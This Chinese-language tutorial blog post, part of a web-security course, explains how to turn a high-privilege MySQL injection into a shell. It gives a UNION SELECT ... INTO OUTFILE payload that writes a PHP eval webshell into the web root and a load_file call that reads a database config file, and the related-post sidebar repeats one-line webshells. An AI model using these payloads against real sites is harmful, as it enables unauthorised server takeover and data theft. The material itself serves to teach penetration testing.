风炫安全Web安全学习第十六节课 高权限sql注入getshell

最新推荐文章于 2021-07-27 20:26:04 发布
最新推荐文章于 2021-07-27 20:26:04 发布
阅读量71 收藏
点赞数
分类专栏: Web安全 渗透测试 网络安全 文章标签: 渗透测试 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hyj123480/article/details/111610753
版权

风炫安全Web安全学习第十六节课 高权限sql注入getshell

sql高权限getshell

前提条件:

  1. 需要知道目标网站绝对路径

  2. 目录具有写的权限

  3. 需要当前数据库用户开启了secure_file_priv

select database() into outfile '/var/www/html/1.txt'

allen' union select 1,'<?php eval($_GET[w]); ?>' into outfile '/var/www/html/2.php' #

site: xxx.com error

写文件

into outfile 将select的结果写入到指定目录的1.txt中

在一些没有回显的注入中可以使用into outfile的结果写入文件中,然后获得权限

读文件

Load_file 函数可以读文件

select load_file('/etc/my.cnf');

风炫安全
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web安全SQL注入
01-21
SQL注入是指将Web页面的原URL、表单域或数据包输入的参数,修改拼接成SQL语句,传递给Web服务器,进而传给数据库服务器以执行数据库命令。当Web应用程序的开发人员对用户所输入的数据不进行过滤或验证(即存在注入点...
黄教头第五周作业 通过sqli进行服务器的远程控制案例测试
qq_44720737的博客
04-07 166
Sql-Inject漏洞手动测试-Os远程控制 一句话木马 如何通过into outfile写入恶意代码并控制OS 一句话木马 一句话木马是一种短小而精悍的木马客户端,隐蔽性好,且功能强大. PHP: <?php@eval($_POST['chopper']);?> ASP: <%eval request(“chopper”)%> ASP.NET: <%@Page L...
通过sqli进行服务器的远程控制案例测试
qq_42764906的博客
04-07 156
输入 得到 输入 得到 当前目录相关文件 得到IP地址
sql注入教程】mysql注入直接getshell
dfdhxb995397的博客
08-30 1559
Mysql注入直接getshell的条件相对来说比较苛刻点把 1:要知道网站绝对路径,可以通过报错,phpinfo界面,404界面等一些方式知道 2:gpc没有开启,开启了单引号被转义了,语句就不能正常执行了 3:要有file权限,默认情况下只有root有 4:对目录要有写权限,一般image之类的存放突破的目录就有 在实际环境中我只遇过一次,为了做实验,我把php.ini文件...
通过sqli进行服务器的远程控制的操作
qq_43814486的博客
04-08 403
通过sql inject漏洞写入恶意代码需要三个前提: 1.需要知道远程目录,就是你的用PHP语言写的网站的那个PHP文件的路径 有一个需要注意的地方,你的路径里边的斜杠是正斜杠,而直接从路径上复制下来的是反斜杠,这里需要更改一下。 ...
基于SQL注入漏洞读写文件Getshell技巧
道阻且长,行则将至。
06-28 1913
文章目录前言手工注入靶场环境into outfileSQLMap靶场环境--os-shell读写文件总结 前言 在 HW 行动和攻防演练过程中,获得 Shell 的方式总结起来大概是以下几种(当然了如果能够通过源码泄露审计出 0day 的大佬的姿势另说……): 暴力破解+弱口令/未授权访问漏洞登录后台,任意文件上传漏洞 Getshell; Shiro、Struts2、Fastjson 等反序列化漏洞导致 RCE; 通过 SQL 注入漏洞写入木马文件并 Getshell…… 在前面一篇文章:渗透测试-Ph
Web安全SQL注入攻击
03-04
①这个晨讲我构思了两个星期,但是之前电脑坏了,一直拖...今天由我给大家带来《web安全SQL注入篇》系列晨讲,首先对程进行简单介绍,SQL注入篇一共分为三讲:第一讲:“纸上谈兵:我们需要在本地架设注入环境,构
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
SQL注入-初入web安全-详细知识图谱
最新发布
11-06
SQL注入初入Web安全详细知识图谱 SQL注入是一种常见的Web应用安全漏洞,指的是攻击者通过构造特殊的输入参数,来改变原始的SQL语句,使得数据库服务器执行恶意的SQL语句,从而达到非法访问或控制数据库的目的。SQL...
Linux系统基础5周入门精讲(服务器介绍)
weixin_30319097的博客
01-13 75
使用工具:(1)源码管理(git工具);(2)自动部署;(3)web服务器 linux基础 服务器介绍 运维的职责:运行和维护服务器 1数据不能丢----大片不能没 2保证网站7*24小时允许---(一直要运行) 3.用户体验要好----打开ia网站速度 服务器的尺寸 服务器的分类 机架式服务器 服务器的核心硬件 HP是惠普 服务器型号(机架式)...
溯源反制思路整合
风炫的博客
07-27 2274
溯源反制思路整合 文章目录溯源反制思路整合0x01反制的整体思路0x02 反制具体思路0x0201 反制主机0x0202 反制后门附件0x0203 反制攻击工具0x03 拿下傀儡机之后如何进行源IP的查找0x0301 日志分析01 Web日志分析02 系统日志分析0x0302 进程分析WindowsLinux0x0303 流量分析通用Windowslinux0x0304 服务查询WindowsLInux0x0305 其他技巧通用查询在线登陆者0x04 溯源相关思路根据IP进行溯源根据域名进行溯源根据ID溯源
cobalt strike 插件开发一
风炫的博客
03-29 1625
关注风炫安全,分享最新网络安全知识。 0x01 agscript简介 agscript为Aggressor Script的简写。 agscript是CobaltStrike 3.0之后版本中内置的脚本语言,利用Aggresor编写脚本可轻松地武装您的CobaltStrike客户端。 agscript是一种简单脚本语言,主要用于红队编写针对肉鸡的攻击脚本。 它有两个作用, 一是可以用来对自己的肉鸡做持久性控制。 二是可以用来扩展或修改Cobalt Strike客户端以满...
cobalt strike使用跳板进行内网渗透
风炫的博客
03-21 1435
0x01 什么是 Pivoting Pivoting ,在本手册中,指的是「将一个受害机器转为其他攻击和工具的跳板」。Cobalt Strike 的Beacon 提供了多种 pivoting 选项。前提是 Beacon 处于交互模式。交互模式意味着一个 Beacon 每 秒内多次连接到团队服务器。使用 sleep 0 命令来使你的 Beacon 进入交互模式。 0x02 开启SOCKS 代理 通过 [beacon] → Pivoting → SOCKS Server 来在你的团队服务器上设..
深入浅出内存马(一)
风炫的博客
07-12 1287
深入浅出内存马(一) 0x01 简述 0x0101 Webshell技术历程 在Web安全领域,Webshell一直是一个非常重要且热门的话题。在目前传统安全领域,Webshell根据功能的不同分为三种类型,分别是:一句话木马,小马,大马。而根据现在防火墙技术的更新迭代,随后出现了加密的木马技术,比如:加密一句话。而我们今天要说的是一种新的无文件的Webshell类型:内存马。 0x0102 为什么会使用内存马? 传统Webshell连接方式,都是先通过某种漏洞将恶意的脚本木马文件上传,然后通过中国菜刀,或
风炫安全WEB安全学习第四十九 靶场的搭建与实战
风炫的博客
02-09 1061
靶场实战 自《网络安全法》实施以后,在互联网上未经授权的渗透测试是违法行为。缺少了实战的战场,我们现在一般用靶场来进行实战的渗透测试学习,因为这样不会影响别人网站服务的正常运行,不会影响到别人的业务。 我在这里推荐几个靶场,然后可以对靶场里面的漏洞进行针对化学习并实战。 线上靶场推荐 https://hack.zkaq.cn/ 封神台,掌控安全的线上靶场 https://www.ichunqiu.com/ I春秋,很早就出来的一个综合的靶场。 https://redtiger.labs.overthewir
Cobalt Strike从入门到精通之定制配置文件进行级攻击
风炫的博客
02-22 960
在线视频地址 Cobalt Strike的配置文件讲解 简介 Beacon是Cobalt Strike为级攻击者建模的Payload。使用Beacon通过HTTP,HTTPS或DNS出口网络。而且Beacon非常灵活,支持异步和交互式通信。异步通信既低又慢。Beacon将通讯本地,下载任务,然后进入睡眠状态。交互式通信实时发生。 cobalt Strike 的Beacon(信标)的一些Http特征信息可以由C2配置文件进行修改和定制化,所以可定制的C2配置文件可以指定服务端如何发送,接受数据的规律和格式,
风炫安全WEB安全学习第三十八 越权漏洞演示与讲解
风炫的博客
01-06 733
风炫安全WEB安全学习第三十八 越权漏洞演示与讲解 越权漏洞 0x01 漏洞介绍 越权漏洞的危害与影响主要是与对应业务的重要性相关,比如说某一页面服务器端响应(不局限于页面返回的信息,有时信息在响应包中,页面不一定能看见)中返回登录名、登录密码、手机号、×××等敏感信息,如果存在平行越权,通过对用户ID的遍历,就可以查看所有用户的敏感信息,这也是一种变相的脱裤,而且很难被防火墙发现,因为这和正常的访问请求没有什么区别,也不会包含特殊字符,具有十足的隐秘性。 水平越权 水平越权指的是攻击者尝试访问与他拥
风炫安全WEB安全学习第四十四 敏感信息泄漏
风炫的博客
01-12 674
敏感信息泄漏 0x01 漏洞简介 敏感数据包括但不限于:口令、密钥、证书、会话标识、License、隐私数据(如短消息的内容)、授权凭据、个人数据(如姓名、住址、电话等)等,在程序文件、配置文件、日志文件、备份文件及数据库中都有可能包含敏感数据。主要分为由版本管理软件导致的泄露, 文件包含导致的泄露和配置错误导致的泄露. 0x02 漏洞原理 由于后台人员的疏忽或者不当的设计,导致不应该被前端用户看到的数据被轻易的访问到。 比如: 通过访问url下的目录,可以直接列出目录下的文件列表; 输入错误的url参数
Cobalt Strike从入门到精通之Web Drive-By web钓鱼攻击
风炫的博客
03-07 464
https://www.bilibili.com/video/BV1P64y1f7e1?p=6 Cobalt Strike Web Drive-By web钓鱼攻击 在这里补充一个上的新的知识点,如何使用python语言的payload 加载器去攻击 # length: 894 bytes from ctypes import * import ctypes buf = "" #这里填写payload PROT_READ = 1 PROT_WRITE = 2 PROT_EXEC = 4 def exec
WEB安全基础-合集篇
10-23
WEB安全基础-合集篇,涵盖了基础SQL注入、文件上传、XSS、CSRF、文件包含、逻辑漏洞等内容。这篇文章适合新手学习参考,通过学习这些知识可以快速了解渗透测试的基础知识。 在这篇合集中,作者首先介绍了WEB安全...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值